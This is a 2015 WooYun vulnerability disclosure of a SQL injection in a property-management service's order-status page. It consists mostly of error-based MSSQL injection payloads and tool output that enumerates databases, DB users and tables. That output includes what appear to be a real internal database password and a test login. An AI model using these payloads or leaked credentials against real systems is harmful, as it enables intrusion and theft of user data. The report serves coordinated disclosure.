当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143499

漏洞标题:一应生活SQL注射可泄露大量信息(14个库/DBA权限/内网数据库配置信息/几十万用户信息)

相关厂商:长城物业

漏洞作者: 路人甲

提交时间:2015-09-26 08:13

修复时间:2015-11-14 09:38

公开时间:2015-11-14 09:38

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-26: 细节已通知厂商并且等待厂商处理中
2015-09-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-10: 细节向核心白帽子及相关领域专家公开
2015-10-20: 细节向普通白帽子公开
2015-10-30: 细节向实习白帽子公开
2015-11-14: 细节向公众公开

简要描述:

详细说明:

注入点:http://**.**.**.**/order/orderstatus?ordernum=PO201509221357345734066

Payload: ordernum=PO201509221357345734066' AND 7406=7406 AND 'vblP'='vblP
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ordernum=PO201509221357345734066' AND 5086=CONVERT(INT,(SELECT CHAR
(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5086=5086) THEN
 CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113))
) AND 'hthp'='hthp
---
[21:34:32] [INFO] testing Microsoft SQL Server
[21:34:33] [INFO] confirming Microsoft SQL Server
[21:34:36] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[21:34:36] [INFO] fetching database names
[21:34:37] [INFO] the SQL query used returns 14 entries
[21:34:38] [INFO] retrieved: CCPG_District
[21:34:38] [INFO] retrieved: CCPG_PM
[21:34:38] [INFO] retrieved: CCPG_SAAS
[21:34:39] [INFO] retrieved: CCPG_SheShangYun
[21:34:40] [INFO] retrieved: CCPGSitecore_core
[21:34:40] [INFO] retrieved: CCPGSitecore_master
[21:34:42] [INFO] retrieved: CCPGSitecore_web
[21:34:42] [INFO] retrieved: HondaSitecore_analytics
[21:34:43] [INFO] retrieved: master
[21:34:44] [INFO] retrieved: model
[21:34:44] [INFO] retrieved: msdb
[21:34:45] [INFO] retrieved: ReportServer
[21:34:46] [INFO] retrieved: ReportServerTempDB
[21:34:46] [INFO] retrieved: tempdb
available databases [14]:
[*] CCPG_District
[*] CCPG_PM
[*] CCPG_SAAS
[*] CCPG_SheShangYun
[*] CCPGSitecore_core
[*] CCPGSitecore_master
[*] CCPGSitecore_web
[*] HondaSitecore_analytics
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


Payload: ordernum=PO201509221357345734066' AND 5086=CONVERT(INT,(SELECT CHAR
(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5086=5086) THEN
 CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113))
) AND 'hthp'='hthp
---
[21:42:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[21:42:05] [INFO] fetching database users
[21:42:05] [INFO] the SQL query used returns 19 entries
[21:42:06] [INFO] retrieved: ##MS_AgentSigningCertificate##
[21:42:06] [INFO] retrieved: ##MS_PolicyEventProcessingLogin##
[21:42:07] [INFO] retrieved: ##MS_PolicySigningCertificate##
[21:42:08] [INFO] retrieved: ##MS_PolicyTsqlExecutionLogin##
[21:42:09] [INFO] retrieved: ##MS_SmoExtendedSigningCertificate##
[21:42:10] [INFO] retrieved: ##MS_SQLAuthenticatorCertificate##
[21:42:11] [INFO] retrieved: ##MS_SQLReplicationSigningCertificate##
[21:42:12] [INFO] retrieved: ##MS_SQLResourceSigningCertificate##
[21:42:13] [INFO] retrieved: CCPG\\\\administrator
[21:42:14] [INFO] retrieved: CCPG\\\\appuser00
[21:42:14] [INFO] retrieved: CCPG\\\\sqladmin
[21:42:15] [INFO] retrieved: CCPVUMADBS00\\\\IUSR_Umall
[21:42:15] [INFO] retrieved: NT AUTHORITY\\\\SYSTEM
[21:42:16] [INFO] retrieved: NT Service\\\\MSSQLSERVER
[21:42:17] [INFO] retrieved: NT SERVICE\\\\ReportServer
[21:42:17] [INFO] retrieved: NT SERVICE\\\\SQLSERVERAGENT
[21:42:18] [INFO] retrieved: NT SERVICE\\\\SQLWriter
[21:42:18] [INFO] retrieved: NT SERVICE\\\\Winmgmt
[21:42:19] [INFO] retrieved: sa
database management system users [19]:
[*] ##MS_AgentSigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_SmoExtendedSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLResourceSigningCertificate##
[*] CCPG\\administrator
[*] CCPG\\appuser00
[*] CCPG\\sqladmin
[*] CCPVUMADBS00\\IUSR_Umall
[*] NT AUTHORITY\\SYSTEM
[*] NT Service\\MSSQLSERVER
[*] NT SERVICE\\ReportServer
[*] NT SERVICE\\SQLSERVERAGENT
[*] NT SERVICE\\SQLWriter
[*] NT SERVICE\\Winmgmt
[*] sa


Payload: ordernum=PO201509221357345734066' AND 5086=CONVERT(INT,(SELECT C
(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5086=5086) T
 CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(11
) AND 'hthp'='hthp
---
[21:50:58] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[21:50:58] [INFO] fetching tables for database: CCPG_SAAS
[21:50:59] [INFO] the SQL query used returns 65 entries
[21:50:59] [INFO] retrieved: dbo.CC_Activity
[21:51:00] [INFO] retrieved: dbo.CC_CallBack
[21:51:00] [INFO] retrieved: dbo.CC_CCNotice
[21:51:01] [INFO] retrieved: dbo.CC_Charging
[21:51:02] [INFO] retrieved: dbo.CC_CsrAuthority
[21:51:03] [INFO] retrieved: dbo.CC_CsrGroup
[21:51:04] [INFO] retrieved: dbo.CC_CsrInfo
[21:51:05] [INFO] retrieved: dbo.CC_CsrStateRecord
[21:51:06] [INFO] retrieved: dbo.CC_CsrTasks
[21:51:06] [INFO] retrieved: dbo.CC_FeeRate
[21:51:07] [INFO] retrieved: dbo.CC_OutboundTask
[21:51:07] [INFO] retrieved: dbo.CC_OutboundTask_Detail
[21:51:08] [INFO] retrieved: dbo.CC_OutboundTaskAssign
[21:51:09] [INFO] retrieved: dbo.CC_ReturnedTask
[21:51:10] [INFO] retrieved: dbo.CC_SMSInfo
[21:51:10] [INFO] retrieved: dbo.CC_SMSReceiverInfo
[21:51:11] [INFO] retrieved: dbo.COM_AttachmentInfo
[21:51:20] [INFO] retrieved: dbo.COM_ButtonCustomizationInfo
[21:51:26] [INFO] retrieved: dbo.COM_DataDictionaryInfo
[21:51:27] [INFO] retrieved: dbo.COM_District
[21:51:28] [INFO] retrieved: dbo.COM_MenuCustomizationInfo
[21:51:28] [INFO] retrieved: dbo.COM_ModuleActionInfo
[21:51:29] [INFO] retrieved: dbo.COM_ModuleGroupInfo
[21:51:30] [INFO] retrieved: dbo.COM_ModuleInfo
[21:51:31] [INFO] retrieved: dbo.COM_OperLogInfo
[21:51:32] [INFO] retrieved: dbo.COM_OrganizationInfo
[21:51:33] [INFO] retrieved: dbo.COM_RoleDataAuthInfo
[21:51:41] [INFO] retrieved: dbo.COM_RoleInfo
[21:51:42] [INFO] retrieved: dbo.COM_RoleModuleAuthInfo
[21:51:43] [INFO] retrieved: dbo.COM_UserGroupInfo
[21:51:43] [INFO] retrieved: dbo.COM_UserGroupRoleInfo
[21:51:44] [INFO] retrieved: dbo.COM_UserGroupUserInfo
[21:51:44] [INFO] retrieved: dbo.COM_UserInfo
[21:51:45] [INFO] retrieved: dbo.COM_UserOrganizationInfo
[21:51:45] [INFO] retrieved: dbo.COM_UserRoleInfo
[21:51:47] [INFO] retrieved: dbo.CP_BlackList
[21:51:48] [INFO] retrieved: dbo.CP_Block
[21:51:49] [INFO] retrieved: dbo.CP_Block_DELETE
[21:51:50] [INFO] retrieved: dbo.CP_Block_old
[21:51:51] [INFO] retrieved: dbo.CP_CallDetailInfo
[21:51:52] [INFO] retrieved: dbo.CP_ContractEEServiceInfo
[21:51:53] [INFO] retrieved: dbo.CP_ContractInfo
[21:51:53] [INFO] retrieved: dbo.CP_ContractOCRMServiceInfo
[21:51:54] [INFO] retrieved: dbo.CP_ContractPMSServiceInfo
[21:51:55] [INFO] retrieved: dbo.CP_ContractServiceInfo
[21:51:56] [INFO] retrieved: dbo.CP_DBConfigInfo
[21:51:58] [INFO] retrieved: dbo.CP_MemberBlock
[21:51:58] [INFO] retrieved: dbo.CP_MemberBlock_old
[21:51:59] [INFO] retrieved: dbo.CP_MemberEEServiceInfo
[21:52:00] [INFO] retrieved: dbo.CP_MemberInfo
[21:52:01] [INFO] retrieved: dbo.CP_MemberLineNumber
[21:52:02] [INFO] retrieved: dbo.CP_MemberOCRMServiceInfo
[21:52:02] [INFO] retrieved: dbo.CP_MemberPMSServiceInfo
[21:52:03] [INFO] retrieved: dbo.CP_MemberResource
[21:52:04] [INFO] retrieved: dbo.CP_MemberWorkorderUpgradeSetting
[21:52:05] [INFO] retrieved: dbo.CP_MessageAccountInfo
[21:52:06] [INFO] retrieved: dbo.CP_MessageAccountPaymentRecordInfo
[21:52:06] [INFO] retrieved: dbo.CP_NoticeMessageInfo
[21:52:07] [INFO] retrieved: dbo.CP_QuestionCommentInfo
[21:52:12] [INFO] retrieved: dbo.CP_QuestionCommentInfo_Bak
[21:52:12] [INFO] retrieved: dbo.CP_QuestionInfo
[21:52:13] [INFO] retrieved: dbo.CP_QuestionInfo_Bak
[21:52:17] [INFO] retrieved: dbo.CP_SendMessageInfo
[21:52:17] [INFO] retrieved: dbo.CP_ServiceInfo
[21:52:18] [INFO] retrieved: dbo.CP_ServiceTrialApplicationInfo
Database: CCPG_SAAS
[65 tables]
+------------------------------------+
| CC_Activity                        |
| CC_CCNotice                        |
| CC_CallBack                        |
| CC_Charging                        |
| CC_CsrAuthority                    |
| CC_CsrGroup                        |
| CC_CsrInfo                         |
| CC_CsrStateRecord                  |
| CC_CsrTasks                        |
| CC_FeeRate                         |
| CC_OutboundTask                    |
| CC_OutboundTaskAssign              |
| CC_OutboundTask_Detail             |
| CC_ReturnedTask                    |
| CC_SMSInfo                         |
| CC_SMSReceiverInfo                 |
| COM_AttachmentInfo                 |
| COM_ButtonCustomizationInfo        |
| COM_DataDictionaryInfo             |
| COM_District                       |
| COM_MenuCustomizationInfo          |
| COM_ModuleActionInfo               |
| COM_ModuleGroupInfo                |
| COM_ModuleInfo                     |
| COM_OperLogInfo                    |
| COM_OrganizationInfo               |
| COM_RoleDataAuthInfo               |
| COM_RoleInfo                       |
| COM_RoleModuleAuthInfo             |
| COM_UserGroupInfo                  |
| COM_UserGroupRoleInfo              |
| COM_UserGroupUserInfo              |
| COM_UserInfo                       |
| COM_UserOrganizationInfo           |
| COM_UserRoleInfo                   |
| CP_BlackList                       |
| CP_Block                           |
| CP_Block_DELETE                    |
| CP_Block_old                       |
| CP_CallDetailInfo                  |
| CP_ContractEEServiceInfo           |
| CP_ContractInfo                    |
| CP_ContractOCRMServiceInfo         |
| CP_ContractPMSServiceInfo          |
| CP_ContractServiceInfo             |
| CP_DBConfigInfo                    |
| CP_MemberBlock                     |
| CP_MemberBlock_old                 |
| CP_MemberEEServiceInfo             |
| CP_MemberInfo                      |
| CP_MemberLineNumber                |
| CP_MemberOCRMServiceInfo           |
| CP_MemberPMSServiceInfo            |
| CP_MemberResource                  |
| CP_MemberWorkorderUpgradeSetting   |
| CP_MessageAccountInfo              |
| CP_MessageAccountPaymentRecordInfo |
| CP_NoticeMessageInfo               |
| CP_QuestionCommentInfo             |
| CP_QuestionCommentInfo_Bak         |
| CP_QuestionInfo                    |
| CP_QuestionInfo_Bak                |
| CP_SendMessageInfo                 |
| CP_ServiceInfo                     |
| CP_ServiceTrialApplicationInfo     |
+------------------------------------+


内网数据库配置表

Payload: ordernum=PO201509221357345734066' AND 7406=7406 AND 'vblP'='vblP
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING claus
    Payload: ordernum=PO201509221357345734066' AND 5086=CONVERT(INT,(SELECT CH
(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5086=5086) TH
 CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113
) AND 'hthp'='hthp
---
[22:00:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[22:00:09] [INFO] fetching columns for table 'CP_DBConfigInfo' in database 'CC
_SAAS'
[22:00:11] [INFO] the SQL query used returns 13 entries
[22:00:11] [INFO] retrieved: Created_Time
[22:00:16] [INFO] retrieved: datetime
[22:00:17] [INFO] retrieved: Created_User
[22:00:18] [INFO] retrieved: nvarchar
[22:00:19] [INFO] retrieved: DB_Address
[22:00:20] [INFO] retrieved: nvarchar
[22:00:20] [INFO] retrieved: DB_Name
[22:00:21] [INFO] retrieved: nvarchar
[22:00:22] [INFO] retrieved: DB_Password
[22:00:23] [INFO] retrieved: nvarchar
[22:00:34] [INFO] retrieved: DB_Username
[22:00:35] [INFO] retrieved: nvarchar
[22:00:36] [INFO] retrieved: GC_Flag
[22:00:37] [INFO] retrieved: bit
[22:00:38] [INFO] retrieved: ID
[22:00:39] [INFO] retrieved: uniqueidentifier
[22:00:39] [INFO] retrieved: ID_DB_Type
[22:00:41] [INFO] retrieved: uniqueidentifier
[22:00:42] [INFO] retrieved: ID_Member
[22:00:43] [INFO] retrieved: uniqueidentifier
[22:00:43] [INFO] retrieved: Updated_Time
[22:00:45] [INFO] retrieved: datetime
[22:00:51] [INFO] retrieved: Updated_User
[22:00:52] [INFO] retrieved: nvarchar
[22:00:53] [INFO] retrieved: Url_Code
[22:00:54] [INFO] retrieved: nvarchar
[22:00:54] [INFO] fetching entries for table 'CP_DBConfigInfo' in database 'CC
_SAAS'
[22:00:55] [INFO] retrieved: 61
[22:00:55] [INFO] fetching number of distinct values for column 'ID'
[22:00:55] [INFO] retrieved: 61
[22:00:55] [INFO] using column 'ID' as a pivot for retrieving row data
[22:00:55] [INFO] retrieved: 0418FE28-D9C1-44E5-94E7-FD5AB7588BEF
[22:00:56] [INFO] retrieved: KAISA_DATA_1226
[22:01:00] [INFO] retrieved: 0
[22:01:00] [INFO] retrieved:
[22:01:01] [INFO] retrieved: 311AB7DA-ABA1-4BA1-B077-754F06E32DB3
[22:01:01] [INFO] retrieved: **.**.**.**
[22:01:02] [INFO] retrieved: CAD7A635-7152-44F6-80A6-9526CFE49B0A
[22:01:03] [INFO] retrieved: 1qaz!QAZ
[22:01:03] [INFO] retrieved: sa
[22:01:04] [INFO] retrieved: 04 13 2015 \\\\?a02:46PM
[22:01:27] [INFO] retrieved: admin
[22:01:28] [INFO] retrieved: 04 13 2015 \\\\?a02:50PM
[22:01:29] [INFO] retrieved: admin
[22:01:32] [INFO] retrieved: 096797D6-162A-4C51-95E9-93225FB04DA8
[22:01:33] [INFO] retrieved: XYCCWY_DATA


CCPG_SheShangYun库表太多,未全部贴出

Payload: ordernum=PO201509221357345734066' AND 7406=7406 AND 'vblP'='vblP
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ordernum=PO201509221357345734066' AND 5086=CONVERT(INT,(SELECT CHAR
(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5086=5086) THEN
 CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113))
) AND 'hthp'='hthp
---
[22:06:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[22:06:44] [INFO] fetching tables for database: CCPG_SheShangYun
[22:06:46] [INFO] the SQL query used returns 2118 entries
[22:06:47] [INFO] retrieved: dbo.AccountPay
[22:06:47] [INFO] retrieved: dbo.AccountReceive
[22:06:48] [INFO] retrieved: dbo.Activity
[22:06:49] [INFO] retrieved: dbo.ActivityArea
[22:06:50] [INFO] retrieved: dbo.ActivityCagegory
[22:06:51] [INFO] retrieved: dbo.ActivityComment
[22:06:51] [INFO] retrieved: dbo.ActivityParticipants
[22:06:52] [INFO] retrieved: dbo.ActivityPhoto
[22:06:52] [INFO] retrieved: dbo.ActivityPrize
[22:06:53] [INFO] retrieved: dbo.ActivityRegistration
[22:06:54] [INFO] retrieved: dbo.ActivityResults
[22:06:55] [INFO] retrieved: dbo.ActivitySaved
[22:06:56] [INFO] retrieved: dbo.ActivitySupport
[22:06:57] [INFO] retrieved: dbo.AdCustomPage
[22:06:58] [INFO] retrieved: dbo.Address
[22:06:59] [INFO] retrieved: dbo.Advert
[22:07:00] [INFO] retrieved: dbo.AdvertCategory
[22:07:01] [INFO] retrieved: dbo.AdvertImages
[22:07:05] [INFO] retrieved: dbo.AdvertImagesRelation
[22:07:07] [INFO] retrieved: dbo.AdvertMerchantRelation
[22:07:08] [INFO] retrieved: dbo.AppPageModule
[22:07:09] [INFO] retrieved: dbo.AppSession
[22:07:10] [INFO] retrieved: dbo.AppUserModule
[22:07:11] [INFO] retrieved: dbo.AppVersion
[22:07:12] [INFO] retrieved: dbo.AspNetRoles
[22:07:13] [INFO] retrieved: dbo.AspNetUserClaims
[22:07:13] [INFO] retrieved: dbo.AspNetUserLogins
[22:07:15] [INFO] retrieved: dbo.AspNetUserRoles
[22:07:16] [INFO] retrieved: dbo.AspNetUsers
[22:07:17] [INFO] retrieved: dbo.AspNetUsers_0805
[22:07:18] [INFO] retrieved: dbo.AspNetUsersLoginInfo
[22:07:20] [INFO] retrieved: dbo.AttributeName
[22:07:20] [INFO] retrieved: dbo.AttributeOption
[22:07:22] [INFO] retrieved: dbo.BottomNavigation
[22:07:23] [INFO] retrieved: dbo.Brand
[22:07:24] [INFO] retrieved: dbo.BrandCategoryRelation
[22:07:26] [INFO] retrieved: dbo.BusinessInfo
[22:07:27] [INFO] retrieved: dbo.CallSource
[22:07:28] [INFO] retrieved: dbo.CarInfo
[22:07:30] [INFO] retrieved: dbo.CategoryPhoto
[22:07:36] [INFO] retrieved: dbo.CommentAndSalesCount
[22:08:50] [INFO] retrieved: dbo.Commission
[22:08:50] [INFO] retrieved: dbo.Community
[22:08:51] [INFO] retrieved: dbo.Community_Bak
[22:08:52] [INFO] retrieved: dbo.Complaint
[22:08:52] [INFO] retrieved: dbo.ComplaintRelatedPhoto
[22:08:53] [INFO] retrieved: dbo.ContactUs
[22:08:53] [INFO] retrieved: dbo.CrowdsourceEquipment
[22:08:54] [INFO] retrieved: dbo.CrowdsourceMerchant
[22:08:55] [INFO] retrieved: dbo.CrowdsourceMerchantArea
[22:09:00] [INFO] retrieved: dbo.CrowdsourceMerchantService
[22:09:23] [INFO] retrieved: dbo.CrowdsourceNotice
[22:09:23] [INFO] retrieved: dbo.CrowdsourceService
[22:09:33] [INFO] retrieved: dbo.CrowdsourceServiceOrder
[22:09:38] [INFO] retrieved: dbo.CrowdsourceServiceOrderComment
[22:09:38] [INFO] retrieved: dbo.CrowdsourceUser
[22:09:42] [INFO] retrieved: dbo.CrowdsourceUserPhotos
[22:09:44] [INFO] retrieved: dbo.CustomerReview
[22:09:45] [INFO] retrieved: dbo.CustomerReview_2014
[22:09:46] [INFO] retrieved: dbo.CustomerReview_2015
[22:09:47] [INFO] retrieved: dbo.CustomerReview_2016
[22:09:47] [INFO] retrieved: dbo.CustomerReview_2017
[22:09:48] [INFO] retrieved: dbo.CustomerReview_2018
[22:09:49] [INFO] retrieved: dbo.CustomerReview_2019
[22:09:49] [INFO] retrieved: dbo.CustomerReview_2020
[22:09:50] [INFO] retrieved: dbo.DataDictionaryInfo
[22:09:51] [INFO] retrieved: dbo.DeliveryAddress
[22:09:52] [INFO] retrieved: dbo.Department
[22:09:53] [INFO] retrieved: dbo.DistributionRange
[22:09:56] [INFO] retrieved: dbo.District
[22:09:57] [INFO] retrieved: dbo.DrainageBrowseRecord
[22:09:58] [INFO] retrieved: dbo.EmailAddress
[22:09:58] [INFO] retrieved: dbo.EmailTask
[22:09:59] [INFO] retrieved: dbo.EmailTemp
[22:10:01] [INFO] retrieved: dbo.Eventbrowse
[22:10:01] [INFO] retrieved: dbo.EventSaved
[22:10:02] [INFO] retrieved: dbo.ExceptionLog
[22:10:02] [INFO] retrieved: dbo.FamilyMember
[22:10:04] [INFO] retrieved: dbo.GenericCategory
[22:10:06] [INFO] retrieved: dbo.Groupon


http://**.**.**.**/Login/Login.aspx
账号:test
密码:123456

1.png


2.png


3.png

漏洞证明:

修复方案:

过滤sql注入特殊字符

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-30 09:38

厂商回复:


CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无